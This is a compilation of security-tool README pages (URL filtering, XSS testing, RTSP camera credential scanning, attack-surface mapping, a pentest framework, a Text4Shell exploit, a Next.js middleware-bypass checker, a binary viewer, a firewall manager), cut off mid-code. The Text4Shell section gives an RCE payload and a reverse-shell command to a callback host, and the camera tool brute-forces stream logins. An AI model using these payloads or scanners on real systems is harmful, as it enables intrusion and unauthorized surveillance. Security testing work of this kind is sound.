    Basic Usage

    The quickest way to include uro in your workflow is to feed it data through stdin and print it to your terminal.

    cat urls.txt | uro

    Advanced usage

    Reading urls from a file (-i/--input)

    uro -i input.txt

    Writing urls to a file (-o/--output)

    If the file already exists, uro will not overwrite the contents. Otherwise, it will create a new file.

    uro -i input.txt -o output.txt

    Whitelist (-w/--whitelist)

    uro will ignore all extensions except the ones provided.

    uro -w php asp html

    Note: Extensionless pages e.g. /books/1 will still be included. To remove them too, use --filter hasext.

    Blacklist (-b/--blacklist)

    uro will ignore the given extensions.

    uro -b jpg png js pdf

    Note: uro has a list of "useless" extensions which it removes by default; that list will be overridden by whatever extensions you provide through blacklist option. Extensionless pages e.g. /books/1 will still be included. To remove them too, use --filter hasext.

    Filters (-f/--filters)

    For granular control, uro supports the following filters:

    1. hasparams: only output urls that have query parameters e.g. http://example.com/page.php?id=
    2. noparams: only output urls that have no query parameters e.g. http://example.com/page.php
    3. hasext: only output urls that have extensions e.g. http://example.com/page.php
    4. noext: only output urls that have no extensions e.g. http://example.com/page
    5. allexts: don't remove any page based on extension e.g. keep .jpg which would be removed otherwise
    6. keepcontent: keep human written content e.g. blogs.
    7. keepslash: don't remove trailing slash from urls e.g. http://example.com/page/
    8. vuln: only output urls with parameters that are known to be vulnerable.

    Example: uro --filters hasext hasparams
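    The hasparams and hasext filters boil down to simple URL predicates; a minimal sketch (illustrative, not uro's code):

```python
import os
from urllib.parse import urlsplit

def has_params(url):
    # True for /page.php?id=1, False for /page.php
    return bool(urlsplit(url).query)

def has_ext(url):
    # True for /page.php, False for extensionless pages like /books/1
    return bool(os.path.splitext(urlsplit(url).path)[1])
```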



    VulnKnox - A Go-based Wrapper For The KNOXSS API To Automate XSS Vulnerability Testing

    By: Unknown


    VulnKnox is a powerful command-line tool written in Go that interfaces with the KNOXSS API. It automates the process of testing URLs for Cross-Site Scripting (XSS) vulnerabilities using the advanced capabilities of the KNOXSS engine.


    Features

    • Supports pipe input for passing file lists and echoing URLs for testing
    • Configurable retries and timeouts
    • Supports GET, POST, and BOTH HTTP methods
    • Advanced Filter Bypass (AFB) feature
    • Flash Mode for quick XSS polyglot testing
    • CheckPoC feature to verify the proof of concept
    • Concurrent processing with configurable parallelism
    • Custom headers support for authenticated requests
    • Proxy support
    • Discord webhook integration for notifications
    • Detailed output with color-coded results

    Installation

    go install github.com/iqzer0/vulnknox@latest

    Configuration

    Before using the tool, you need to set up your configuration:

    API Key

    Obtain your KNOXSS API key from knoxss.me.

    On the first run, a default configuration file will be created at:

    Linux/macOS: ~/.config/vulnknox/config.json
    Windows: %APPDATA%\VulnKnox\config.json
    Edit the config.json file and replace YOUR_API_KEY_HERE with your actual API key.

    Discord Webhook (Optional)

    If you want to receive notifications on Discord, add your webhook URL to the config.json file or use the -dw flag.

    Usage

    Usage of vulnknox:

    -u Input URL to send to KNOXSS API
    -i Input file containing URLs to send to KNOXSS API
    -X GET HTTP method to use: GET, POST, or BOTH
    -pd POST data in format 'param1=value&param2=value'
    -headers Custom headers in format 'Header1:value1,Header2:value2'
    -afb Use Advanced Filter Bypass
    -checkpoc Enable CheckPoC feature
    -flash Enable Flash Mode
    -o The file to save the results to
    -ow Overwrite output file if it exists
    -oa Output all results to file, not just successful ones
    -s Only show successful XSS payloads in output
    -p 3 Number of parallel processes (1-5)
    -t 600 Timeout for API requests in seconds
    -dw Discord Webhook URL (overrides config file)
    -r 3 Number of retries for failed requests
    -ri 30 Interval between retries in seconds
    -sb 0 Skip domains after this many 403 responses
    -proxy Proxy URL (e.g., http://127.0.0.1:8080)
    -v Verbose output
    -version Show version number
    -no-banner Suppress the banner
    -api-key KNOXSS API Key (overrides config file)
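    The -r/-ri retry flags can be illustrated with a generic retry loop (a sketch of the semantics, not VulnKnox's actual Go implementation):

```python
import time

def with_retries(request_fn, retries=3, interval=30, sleep=time.sleep):
    """Call request_fn until it succeeds or retries run out,
    waiting `interval` seconds between attempts (-r / -ri)."""
    last_exc = None
    for attempt in range(retries + 1):
        try:
            return request_fn()
        except Exception as exc:  # in practice: network/API errors only
            last_exc = exc
            if attempt < retries:
                sleep(interval)
    raise last_exc
```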

    Basic Examples

    Test a single URL using GET method:

    vulnknox -u "https://example.com/page?param=value"

    Test a URL with POST data:

    vulnknox -u "https://example.com/submit" -X POST -pd "param1=value1&param2=value2"

    Enable Advanced Filter Bypass and Flash Mode:

    vulnknox -u "https://example.com/page?param=value" -afb -flash

    Use custom headers (e.g., for authentication):

    vulnknox -u "https://example.com/secure" -headers "Cookie:sessionid=abc123"

    Process URLs from a file with 5 concurrent processes:

    vulnknox -i urls.txt -p 5

    Send notifications to Discord on successful XSS findings:

    vulnknox -u "https://example.com/page?param=value" -dw "https://discord.com/api/webhooks/your/webhook/url"

    Advanced Usage

    Test both GET and POST methods with CheckPoC enabled:

    vulnknox -u "https://example.com/page" -X BOTH -checkpoc

    Use a proxy and increase the number of retries:

    vulnknox -u "https://example.com/page?param=value" -proxy "http://127.0.0.1:8080" -r 5

    Suppress the banner and only show successful XSS payloads:

    vulnknox -u "https://example.com/page?param=value" -no-banner -s

    Output Explanation

    [ XSS! ]: Indicates a successful XSS payload was found.
    [ SAFE ]: No XSS vulnerability was found in the target.
    [ ERR! ]: An error occurred during the request.
    [ SKIP ]: The domain or URL was skipped due to multiple failed attempts (e.g., after receiving too many 403 Forbidden responses as specified by the -sb option).
    [BALANCE]: Indicates your current API usage with KNOXSS, showing how many API calls you've used out of your total allowance.

    The tool also provides a summary at the end of execution, including the number of requests made, successful XSS findings, safe responses, errors, and any skipped domains.

    Contributing

    Contributions are welcome! If you have suggestions for improvements or encounter any issues, please open an issue or submit a pull request.

    License

    This project is licensed under the MIT License.

    Credits

    @KN0X55
    @BruteLogic
    @xnl_h4ck3r



    Camtruder - Advanced RTSP Camera Discovery and Vulnerability Assessment Tool

    By: Unknown


    Camtruder is a high-performance RTSP camera discovery and vulnerability assessment tool written in Go. It efficiently scans and identifies vulnerable RTSP cameras across networks using various authentication methods and path combinations, with support for both targeted and internet-wide scanning capabilities.


    🌟 Key Features

    • Advanced Scanning Capabilities
    • Single IP targeting
    • CIDR range scanning
    • File-based target lists
    • Pipe input support
    • Internet-wide scanning with customizable limits
    • Intelligent port discovery
    • Location-based search using RIPE database
    • Raw CIDR output for integration with other tools

    • Screenshot Capability

    • Capture screenshots of discovered cameras
    • Automatic saving of JPEG images
    • Requires ffmpeg installation
    • Configurable output directory

    • Location-Based Search

    • Search by city or country name
    • RIPE database integration
    • Detailed output with netnames and IP ranges
    • CIDR notation support
    • Raw output mode for scripting

    • Comprehensive Authentication Testing

    • Built-in common credential database
    • Custom username/password list support
    • File-based credential input
    • Multiple authentication format handling
    • Credential validation system

    • Smart Path Discovery

    • Extensive default path database
    • Vendor-specific path detection
    • Dynamic path generation
    • Automatic path validation

    • High Performance Architecture

    • Multi-threaded scanning engine
    • Configurable connection timeouts
    • Efficient resource management
    • Smart retry mechanisms
    • Parallel connection handling

    • Advanced Output & Analysis

    • Real-time console feedback
    • Detailed logging system
    • Camera fingerprinting
    • Vendor detection
    • Stream capability analysis
    • Multiple output formats (verbose, raw)

    πŸ“‹ Requirements

    • Go 1.19 or higher
    • ffmpeg (required for screenshot functionality)
    • Internet connection
    • Root/Administrator privileges (for certain scanning modes)
    • Sufficient system resources for large-scale scans

    πŸ”§ Installation

    Using go install (recommended)

    go install github.com/ALW1EZ/camtruder@v3.7.0

    From source

    git clone https://github.com/ALW1EZ/camtruder.git
    cd camtruder
    go build

    πŸš€ Usage

    Basic Commands

    # Scan a single IP
    ./camtruder -t 192.168.1.100

    # Scan a network range
    ./camtruder -t 192.168.1.0/24

    # Search by location with detailed output
    ./camtruder -t london -s
    > [ NET-ISP ] [ 192.168.1.0/24 ] [256]

    # Get raw CIDR ranges for location
    ./camtruder -t london -ss
    > 192.168.1.0/24

    # Scan multiple IPs from file
    ./camtruder -t targets.txt

    # Take screenshots of discovered cameras
    ./camtruder -t 192.168.1.0/24 -m screenshots

    # Pipe from port scanners
    naabu -host 192.168.1.0/24 -p 554 | camtruder
    masscan 192.168.1.0/24 -p554 --rate 1000 | awk '{print $6}' | camtruder
    zmap -p554 192.168.0.0/16 | camtruder

    # Internet scan (scan till 100 hits)
    ./camtruder -t 100

    Advanced Options

    # Custom credentials with increased threads
    ./camtruder -t 192.168.1.0/24 -u admin,root -p pass123,admin123 -w 50

    # Location search with raw output piped to zmap
    ./camtruder -t berlin -ss | while read range; do zmap -p 554 $range; done

    # Save results to file (as full url, you can use mpv --playlist=results.txt to watch the streams)
    ./camtruder -t istanbul -o results.txt

    # Internet scan with limit of 50 workers and verbose output
    ./camtruder -t 100 -w 50 -v

    πŸ› οΈ Command Line Options

    Option Description Default
    -t Target IP, CIDR range, location, or file Required
    -u Custom username(s) Built-in list
    -p Custom password(s) Built-in list
    -w Number of threads 20
    -to Connection timeout (seconds) 5
    -o Output file path None
    -v Verbose output False
    -s Search only - shows ranges with netnames False
    -ss Raw IP range output - only CIDR ranges False
    -po RTSP port 554
    -m Directory to save screenshots (requires ffmpeg) None

    πŸ“Š Output Formats

    Standard Search Output (-s)

    [ TR-NET-ISP ] [ 193.3.52.0/24 ] [256]
    [ EXAMPLE-ISP ] [ 212.175.100.136/29 ] [8]

    Raw CIDR Output (-ss)

    193.3.52.0/24
    212.175.100.136/29

    Scan Results

    ╭─ Found vulnerable camera [Hikvision, H264, 30fps]
    β”œ Host : 192.168.1.100:554
    β”œ Geo : United States/California/Berkeley
    β”œ Auth : admin:12345
    β”œ Path : /Streaming/Channels/1
    β•° URL : rtsp://admin:12345@192.168.1.100:554/Streaming/Channels/1
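    The URL in the result above is one candidate out of many; a scanner of this kind enumerates every credential/path combination per host. A minimal sketch (illustrative, not Camtruder's actual code):

```python
from itertools import product

def candidate_urls(host, port, creds, paths):
    # One rtsp:// URL per (credential, path) pair, in the same
    # format as the URL shown in the scan results above.
    for (user, pwd), path in product(creds, paths):
        yield f"rtsp://{user}:{pwd}@{host}:{port}{path}"

urls = list(candidate_urls(
    "192.168.1.100", 554,
    [("admin", "12345"), ("admin", "admin")],
    ["/Streaming/Channels/1", "/live.sdp"],
))
```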

    ⚠️ Disclaimer

    This tool is intended for security research and authorized testing only. Users are responsible for ensuring they have permission to scan target systems and comply with all applicable laws and regulations.

    πŸ“ License

    This project is licensed under the MIT License - see the LICENSE file for details.

    πŸ™ Acknowledgments

    • Thanks to all contributors and the security research community
    • Special thanks to the Go RTSP library maintainers
    • Inspired by various open-source security tools

    πŸ“¬ Contact


    Made by @ALW1EZ



    Frogy2.0 - An Automated External Reconnaissance And Attack Surface Management (ASM) Toolkit

    By: Unknown


    Frogy 2.0 is an automated external reconnaissance and Attack Surface Management (ASM) toolkit designed to map out an organization's entire internet presence. It identifies assets, IP addresses, web applications, and other metadata across the public internet and then prioritizes them from highest (most attractive) to lowest (least attractive) from an attacker's perspective.


    Features

    • Comprehensive recon:
      Aggregate subdomains and assets using multiple tools (CHAOS, Subfinder, Assetfinder, crt.sh) to map an organization's entire digital footprint.

    • Live asset verification:
      Validate assets with live DNS resolution and port scanning (using DNSX and Naabu) to confirm what is publicly reachable.

    • In-depth web recon:
      Collect detailed HTTP response data (via HTTPX) including metadata, technology stack, status codes, content lengths, and more.

    • Smart prioritization:
      Use a composite scoring system that considers homepage status, login interfaces, technology stack, DNS data, and much more to generate a risk score for each asset, helping bug bounty hunters and pentesters focus on the most promising targets first.

    • Professional reporting:
      Generate a dynamic, colour-coded HTML report with a modern design and dark/light theme toggle.

    Risk Scoring: Asset Attractiveness Explained

    In this tool, risk scoring is based on the notion of asset attractivenessβ€”the idea that certain attributes or characteristics make an asset more interesting to attackers. If we see more of these attributes, the overall score goes up, indicating a broader "attack surface" that adversaries could leverage. Below is an overview of how each factor contributes to the final risk score.

    Screenshots


    1. Purpose of the Asset

    • Employee-Intended Assets
      If a subdomain or system is meant for internal (employee/colleague) use, it's often higher value for attackers. Internal portals or dashboards tend to hold sensitive data or offer privileged functionality. Therefore, if the domain is flagged as employee‐only, its score increases.

    2. URLs Found

    • Valid/Accessible URL
      If the tool identifies a workable URL (e.g., HTTP/HTTPS) for the asset, it means there's a real endpoint to attack. An asset that isn't listening on a web port or is offline is less interestingβ€”so any resolvable URL raises the score slightly.

    3. Login Interfaces

    • Login Pages
      The presence of a login form indicates some form of access control or user authentication. Attackers often target logins to brute‐force credentials, attempt SQL injection, or exploit session handling. Thus, any discovered login endpoint bumps the score.

    4. HTTP Status 200

    • Accessible Status Code
      If an endpoint actually returns a 200 OK, it often means the page is legitimately reachable and responding with content. A 200 OK is more interesting to attackers than a 404 or a redirectβ€”so a 200 status modestly increases the risk.

    5. TLS Version

    • Modern vs. Outdated TLS
      If an asset is using older SSL/TLS protocols (or no TLS), that's a bigger risk. However, to simplify:
    • TLS 1.2 or 1.3 is considered standard (no penalty).
    • Anything older or absent is penalized by adding to the score.

    6. Certificate Expiry

    • Imminent Expiry
      Certificates expiring soon (within a few weeks) can indicate potential mismanagement or a higher chance of downtime or misconfiguration. Short‐term expiry windows (≀ 7 days, ≀ 14 days, ≀ 30 days) add a cumulative boost to the risk score.

    7. Missing Security Headers

    • Security Header Hygiene
      The tool checks for typical headers like:
    • Strict-Transport-Security (HSTS)
    • X-Frame-Options
    • Content-Security-Policy
    • X-XSS-Protection
    • Referrer-Policy
    • Permissions-Policy

    Missing or disabled headers mean an endpoint is more prone to common web exploits. Each absent header increments the score.

    8. Open Ports

    • Port Exposure
      The more open ports (and associated services) an asset exposes, the broader the potential attack surface. Each open port adds to the risk score.

    9. Technology Stack (Tech Count)

    • Number of Technologies Detected
      Attackers love multi‐tech stacks because more software β†’ more possible CVEs or misconfigurations. Each identified technology (e.g., Apache, PHP, jQuery, etc.) adds to the overall attractiveness of the target.

    Putting It All Together

    Each factor above contributes one or more points to the final risk score. For example:

    1. +1 if the purpose is employee‐intended
    2. +1 if the asset is a valid URL
    3. +1 if a login is found
    4. +1 if it returns HTTP 200
    5. +1 if TLS is older than 1.2 or absent
    6. +1–3 for certificates expiring soon (≀ 30 days)
    7. +1 for each missing security header
    8. +1 per open port
    9. +1 per detected technology
    10. +1 per open management port
    11. +1 per open database port

    Once all factors are tallied, we get a numeric risk score. A higher score means a more interesting asset, with more room for a pentester (or attacker) to probe.
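    The tally can be sketched as a simple scoring function (field names here are illustrative, not Frogy's actual data model):

```python
def risk_score(asset):
    # Tally the factors listed above; booleans count as 0 or 1.
    score = 0
    score += asset.get("employee_intended", False)
    score += asset.get("has_url", False)
    score += asset.get("has_login", False)
    score += asset.get("status") == 200
    score += asset.get("tls_version", 0) < 1.2        # older or absent TLS
    days = asset.get("cert_days_left")
    if days is not None:                              # cumulative expiry boost
        score += sum(days <= limit for limit in (7, 14, 30))
    score += len(asset.get("missing_headers", []))    # +1 per absent header
    score += len(asset.get("open_ports", []))         # +1 per open port
    score += len(asset.get("technologies", []))       # +1 per detected tech
    score += len(asset.get("management_ports", []))   # +1 per management port
    score += len(asset.get("database_ports", []))     # +1 per database port
    return score
```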

    Why This Matters
    This approach helps you quickly prioritize which assets warrant deeper testing. Subdomains with high counts of open ports, advanced internal usage, missing headers, or login panels are more complex, more privileged, or more likely to be misconfiguredβ€”therefore, your security team can focus on those first.

    Installation

    Clone the repository and run the installer script to set up all dependencies and tools:

    chmod +x install.sh
    ./install.sh

    Usage

    chmod +x frogy.sh
    ./frogy.sh domains.txt

    Video Demo

    https://www.youtube.com/watch?v=LHlU4CYNj1M

    Future Roadmap

    • Completed βœ… ~~Adding security and compliance-related data (SSL/TLS hygiene, SPF, DMARC, Headers etc)~~
    • Completed βœ… ~~Allow to filter column data.~~
    • Completed βœ… ~~Add more analytics based on new data.~~
    • Completed βœ… ~~Identify login portals.~~
    • Completed βœ… ~~Basic dashboard/analytics if possible.~~
    • Completed βœ… ~~Display all open ports in one of the table columns.~~
    • Completed βœ… ~~Pagination to access information faster without choking or lagging on the home page.~~
    • Completed βœ… ~~Change font color in darkmode.~~
    • Completed βœ… ~~Identify traditional endpoints vs. API endpoints.~~
    • Completed βœ… ~~Identifying customer-intended vs colleague-intended applications.~~
    • Completed βœ… ~~Enhance prioritisation for target picking. (Scoring based on management ports, login found, customer vs colleague intended apps, security headers not set, ssl/tls usage, etc.)~~
    • Completed βœ… ~~Implement parallel run, time out functionality.~~
    • Completed βœ… ~~Scan SSL/TLS for the url:port pattern and not just domain:443 pattern.-~~
    • Completed βœ… ~~Using mouseover on the attack surface column's score, you can now know why and how score is calculated-~~
    • Completed βœ… ~~Generate CSV output same as HTML table.~~
    • Completed βœ… ~~Self-contained HTML output is generated now. So no need to host a file on web server to access results.~~
    • Completed βœ… ~~To add all DNS records (A, MX, SOA, SRV, CNAME, CAA, etc.)~~
    • Completed βœ… ~~Consolidate the two CDN charts into one.~~
    • Completed βœ… ~~Added PTR record column to the main table.~~
    • Completed βœ… ~~Implemented horizontal and vertical scrolling for tables and charts, with the first title row frozen for easier data reference while scrolling.~~
    • Completed βœ… ~~Added screenshot functionality.~~
    • Completed βœ… ~~Added logging functionality. Logs are stored at /logs/logs.log~~
    • Completed βœ… ~~Added extra score for the management and database ports exposed.~~
    • Solve the screen jerk issue.
    • Identify abandoned and unwanted applications.


    PEGASUS-NEO - A Comprehensive Penetration Testing Framework Designed For Security Professionals And Ethical Hackers. It Combines Multiple Security Tools And Custom Modules For Reconnaissance, Exploitation, Wireless Attacks, Web Hacking, And More

    By: Unknown


    [PEGASUS-NEO ASCII-art banner]

    PEGASUS-NEO Penetration Testing Framework


    πŸ›‘οΈ Description

    PEGASUS-NEO is a comprehensive penetration testing framework designed for security professionals and ethical hackers. It combines multiple security tools and custom modules for reconnaissance, exploitation, wireless attacks, web hacking, and more.

    ⚠️ Legal Disclaimer

    This tool is provided for educational and ethical testing purposes only. Usage of PEGASUS-NEO for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state, and federal laws.

    Developers assume no liability and are not responsible for any misuse or damage caused by this program.

    πŸ”’ Copyright Notice

    PEGASUS-NEO - Advanced Penetration Testing Framework
    Copyright (C) 2024 Letda Kes dr. Sobri. All rights reserved.

    This software is proprietary and confidential. Unauthorized copying, transfer, or
    reproduction of this software, via any medium is strictly prohibited.

    Written by Letda Kes dr. Sobri <muhammadsobrimaulana31@gmail.com>, January 2024

    🌟 Features

    Password: Sobri

    • Reconnaissance & OSINT
    • Network scanning
    • Email harvesting
    • Domain enumeration
    • Social media tracking

    • Exploitation & Pentesting

    • Automated exploitation
    • Password attacks
    • SQL injection
    • Custom payload generation

    • Wireless Attacks

    • WiFi cracking
    • Evil twin attacks
    • WPS exploitation

    • Web Attacks

    • Directory scanning
    • XSS detection
    • SQL injection
    • CMS scanning

    • Social Engineering

    • Phishing templates
    • Email spoofing
    • Credential harvesting

    • Tracking & Analysis

    • IP geolocation
    • Phone number tracking
    • Email analysis
    • Social media hunting

    πŸ”§ Installation

    # Clone the repository
    git clone https://github.com/sobri3195/pegasus-neo.git

    # Change directory
    cd pegasus-neo

    # Install dependencies
    sudo python3 -m pip install -r requirements.txt

    # Run the tool
    sudo python3 pegasus_neo.py

    πŸ“‹ Requirements

    • Python 3.8+
    • Linux Operating System (Kali/Ubuntu recommended)
    • Root privileges
    • Internet connection

    πŸš€ Usage

    1. Start the tool:
    sudo python3 pegasus_neo.py
    2. Enter the authentication password
    3. Select a category from the main menu
    4. Choose a specific tool or module
    5. Follow the on-screen instructions

    πŸ” Security Features

    • Source code protection
    • Integrity checking
    • Anti-tampering mechanisms
    • Encrypted storage
    • Authentication system

    πŸ› οΈ Supported Tools

    Reconnaissance & OSINT

    • Nmap
    • Wireshark
    • Maltego
    • Shodan
    • theHarvester
    • Recon-ng
    • SpiderFoot
    • FOCA
    • Metagoofil

    Exploitation & Pentesting

    • Metasploit
    • SQLmap
    • Commix
    • BeEF
    • SET
    • Hydra
    • John the Ripper
    • Hashcat

    Wireless Hacking

    • Aircrack-ng
    • Kismet
    • WiFite
    • Fern Wifi Cracker
    • Reaver
    • Wifiphisher
    • Cowpatty
    • Fluxion

    Web Hacking

    • Burp Suite
    • OWASP ZAP
    • Nikto
    • XSStrike
    • Wapiti
    • Sublist3r
    • DirBuster
    • WPScan

    πŸ“ Version History

    • v1.0.0 (2024-01) - Initial release
    • v1.1.0 (2024-02) - Added tracking modules
    • v1.2.0 (2024-03) - Added tool installer

    πŸ‘₯ Contributing

    This is a proprietary project and contributions are not accepted at this time.

    🀝 Support

    For support, please email muhammadsobrimaulana31@gmail.com or visit https://lynk.id/muhsobrimaulana

    βš–οΈ License

    This project is protected under proprietary license. See the LICENSE file for details.

    Made with ❀️ by Letda Kes dr. Sobri



    Text4Shell-Exploit - A Custom Python-based Proof-Of-Concept (PoC) Exploit Targeting Text4Shell (CVE-2022-42889), A Critical Remote Code Execution Vulnerability In Apache Commons Text Versions < 1.10

    By: Unknown


    A custom Python-based proof-of-concept (PoC) exploit targeting Text4Shell (CVE-2022-42889), a critical remote code execution vulnerability in Apache Commons Text versions < 1.10. This exploit targets vulnerable Java applications that use the StringSubstitutor class with interpolation enabled, allowing injection of ${script:...} expressions to execute arbitrary system commands.

    In this PoC, exploitation is demonstrated via the data query parameter; however, the vulnerable parameter name may vary depending on the implementation. Users should adapt the payload and request path accordingly based on the target application's logic.

    Disclaimer: This exploit is provided for educational and authorized penetration testing purposes only. Use responsibly and at your own risk.


    Description

    This is a custom Python3 exploit for the Apache Commons Text vulnerability known as Text4Shell (CVE-2022-42889). It allows Remote Code Execution (RCE) via insecure interpolators when user input is dynamically evaluated by StringSubstitutor.

    Tested against:
    • Apache Commons Text < 1.10.0
    • Java applications using ${script:...} interpolation from untrusted input

    Usage

    python3 text4shell.py <target_ip> <callback_ip> <callback_port>

    Example

    python3 text4shell.py 127.0.0.1 192.168.1.2 4444

    Make sure to set up a listener on your attacking machine:

    nc -nlvp 4444

    Payload Logic

    The script injects:

    ${script:javascript:java.lang.Runtime.getRuntime().exec(...)}

    The reverse shell command is sent via the data parameter using a POST request.
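    Assembling and encoding that payload can be sketched as follows (the command string and parameter handling are illustrative; as noted above, adapt them to the target application):

```python
from urllib.parse import quote

def build_payload(callback_ip, callback_port):
    # Illustrative reverse-shell command; the actual exploit may differ.
    cmd = f"nc {callback_ip} {callback_port} -e /bin/sh"
    expr = ("${script:javascript:java.lang.Runtime"
            ".getRuntime().exec('" + cmd + "')}")
    return "data=" + quote(expr)  # URL-encode for the POST body

payload = build_payload("192.168.1.2", 4444)
```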



    Ghost-Route - Ghost Route Detects If A Next JS Site Is Vulnerable To The Corrupt Middleware Bypass Bug (CVE-2025-29927)

    By: Unknown


    A Python script to check Next.js sites for corrupt middleware vulnerability (CVE-2025-29927).

    The corrupt middleware vulnerability allows an attacker to bypass authentication and access protected routes by sending a custom x-middleware-subrequest header.
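    The check itself reduces to comparing responses with and without the header; a minimal offline sketch (the header value below is one payload reported in public CVE-2025-29927 writeups and varies by Next.js version):

```python
# One reported payload repeats the middleware module name enough times
# to trip the subrequest recursion-depth check (value varies by version).
BYPASS_HEADERS = {"x-middleware-subrequest": ":".join(["middleware"] * 5)}

def looks_vulnerable(status_without_header, status_with_header):
    # A protected route normally redirects or denies (3xx/401/403);
    # getting 200 only with the header suggests middleware was skipped.
    return (status_without_header in (301, 302, 307, 308, 401, 403)
            and status_with_header == 200)
```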

    Next.js versions affected: 11.1.4 and up

    [!WARNING] This tool is for educational purposes only. Do not use it on websites or systems you do not own or have explicit permission to test. Unauthorized testing may be illegal and unethical.


    Installation

    Clone the repo

    git clone https://github.com/takumade/ghost-route.git
    cd ghost-route

    Create and activate virtual environment

    python -m venv .venv
    source .venv/bin/activate

    Install dependencies

    pip install -r requirements.txt

    Usage

    python ghost-route.py <url> <path> <show_headers>
    • <url>: Base URL of the Next.js site (e.g., https://example.com)
    • <path>: Protected path to test (default: /admin)
    • <show_headers>: Show response headers (default: False)

    Example

    Basic Example

    python ghost-route.py https://example.com /admin

    Show Response Headers

    python ghost-route.py https://example.com /admin True

    License

    MIT License

    Credits



    Bytesrevealer - Online Reverse Engineering Viewer

    By: Unknown


    Bytes Revealer is a powerful reverse engineering and binary analysis tool designed for security researchers, forensic analysts, and developers. With features like hex view, visual representation, string extraction, entropy calculation, and file signature detection, it helps users uncover hidden data inside files. Whether you are analyzing malware, debugging binaries, or investigating unknown file formats, Bytes Revealer makes it easy to explore, search, and extract valuable information from any binary file.

    Bytes Revealer does NOT store any files or data. All analysis is performed in your browser.

    Current limitation: files under 50MB support all analysis features; larger files (up to 1.5GB) are limited to Visual View and Hex View.


    Features

    File Analysis

    • Chunked file processing for memory efficiency
    • Real-time progress tracking
    • File signature detection
    • Hash calculations (MD5, SHA-1, SHA-256)
    • Entropy and Bytes Frequency analysis
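    Of these metrics, entropy is the simplest to reproduce; a minimal Shannon-entropy sketch (in Python for illustration; Bytes Revealer itself runs in the browser as JavaScript):

```python
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    # Bits per byte: 0.0 for constant data, 8.0 for uniform random bytes.
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())
```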

    Multiple Views

    File View

    • Basic file information and metadata
    • File signatures detection
    • Hash values
    • Entropy calculation
    • Statistical analysis

    Visual View

    • Binary data visualization
    • ASCII or Bytes searching
    • Data distribution view
    • Highlighted pattern matching

    Hex View

    • Traditional hex editor interface
    • Byte-level inspection
    • Highlighted pattern matching
    • ASCII representation
    • ASCII or Bytes searching

    String Analysis

    • ASCII and UTF-8 string extraction
    • String length analysis
    • String type categorization
    • Advanced filtering and sorting
    • String pattern recognition
    • Export capabilities

    Search Capabilities

    • Hex pattern search
    • ASCII/UTF-8 string search
    • Regular expression support
    • Highlighted search results

    Technical Details

    Built With

    • Vue.js 3
    • Tailwind CSS
    • Web Workers for performance
    • Modern JavaScript APIs

    Performance Features

    • Chunked file processing
    • Web Worker implementation
    • Memory optimization
    • Cancelable operations
    • Progress tracking

    Getting Started

    Prerequisites

    # Node.js 14+ is required
    node -v

    Docker Usage

    docker-compose build --no-cache

    docker-compose up -d

    Now open your browser: http://localhost:8080/

    To stop the docker container

    docker-compose down

    Installation

    # Clone the repository
    git clone https://github.com/vulnex/bytesrevealer

    # Navigate to project directory
    cd bytesrevealer

    # Install dependencies
    npm install

    # Start development server
    npm run dev

    Building for Production

    # Build the application
    npm run build

    # Preview production build
    npm run preview

    Usage

    1. File Upload
    • Click "Choose File" or drag and drop a file
    • Progress bar shows upload and analysis status

    2. Analysis Views
    • Switch between views using the tab interface
    • Each view provides different analysis perspectives
    • Real-time updates as you navigate

    3. Search Functions
    • Use the search bar for pattern matching
    • Toggle between hex and string search modes
    • Results are highlighted in the current view

    4. String Analysis
    • View extracted strings with type and length
    • Filter strings by type or content
    • Sort by various criteria
    • Export results in multiple formats

    Performance Considerations

    • Large files are processed in chunks
    • Web Workers handle intensive operations
    • Memory usage is optimized
    • Operations can be canceled if needed

    Browser Compatibility

    • Chrome 80+
    • Firefox 75+
    • Safari 13.1+
    • Edge 80+

    Contributing

    1. Fork the project
    2. Create your feature branch (git checkout -b feature/AmazingFeature)
    3. Commit your changes (git commit -m 'Add some AmazingFeature')
    4. Push to the branch (git push origin feature/AmazingFeature)
    5. Open a Pull Request

    License

    This project is licensed under the MIT License - see the LICENSE.md file for details.

    Security Considerations

    • All strings are properly escaped
    • Input validation is implemented
    • Memory limits are enforced
    • File size restrictions are in place

    Future Enhancements

    • Additional file format support
    • More visualization options
    • Pattern recognition improvements
    • Advanced string analysis features
    • Export/import capabilities
    • Collaboration features


    CentralizedFirewall - Provides A Firewall Manager API Designed To Centralize And Streamline The Management Of Firewall Configurations

    By: Unknown


    Firewall Manager API Project

    Installation

    Follow these steps to set up and run the API project:

    1. Clone the Repository

    git clone https://github.com/adriyansyah-mf/CentralizedFirewall
    cd CentralizedFirewall

    2. Edit the .env File

    Update the environment variables in .env according to your configuration.

    nano .env

    3. Start the API with Docker Compose

    docker compose up -d

    This will start the API in detached mode.

    4. Verify the API is Running

    Check if the containers are up:

    docker ps

    Additional Commands

    Stop the API

    docker compose down

    Restart the API

    docker compose restart


    How to setup for the first time and connect to firewall client

    1. Install the Firewall Agent on your node server.
    2. Run the agent with the following command:
    sudo dpkg -i firewall-client_deb.deb
    3. Create a new group on the Firewall Manager.
    4. Create a new API key on the Firewall Manager.
    5. Edit the configuration file on the node server:
    nano /usr/local/bin/config.ini
    6. Add the following configuration:
    [settings]
    api_url = API-URL
    api_key = API-KEY
    hostname = Node Hostname (make it unique and identical to the hostname on the SIEM)
    7. Restart the firewall agent:
    systemctl daemon-reload
    systemctl start firewall-agent
    8. Check the status of the firewall agent:
    systemctl status firewall-agent
    9. You will see the connected node on the Firewall Manager.

    Default Credential

    Username: admin
    Password: admin

    You can change the default credentials on the settings page.

    How to Integrate with a SIEM

    1. Install the SIEM on your server.
    2. Configure the SIEM to send logs to the Firewall Manager (you can do this via SOAR or your SIEM configuration). The request should be a POST with the following format:
    curl -X 'POST' \
    'http://api-server:8000/general/add-ip?ip=123.1.1.99&hostname=test&apikey=apikey&comment=log' \
    -H 'accept: application/json' \
    -d ''
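The same request can be scripted from a SOAR playbook; the sketch below mirrors the curl example using only the Python standard library (the api-server host, API key, and parameter values are the placeholders from the example above):

```python
import json
import urllib.parse
import urllib.request

def build_add_ip_url(api_server, ip, hostname, apikey, comment="log"):
    # Mirrors the curl example: POST /general/add-ip with query parameters.
    query = urllib.parse.urlencode(
        {"ip": ip, "hostname": hostname, "apikey": apikey, "comment": comment})
    return f"{api_server}/general/add-ip?{query}"

def report_ip(api_server, ip, hostname, apikey, comment="log"):
    # Sends the POST and returns the decoded JSON response.
    req = urllib.request.Request(
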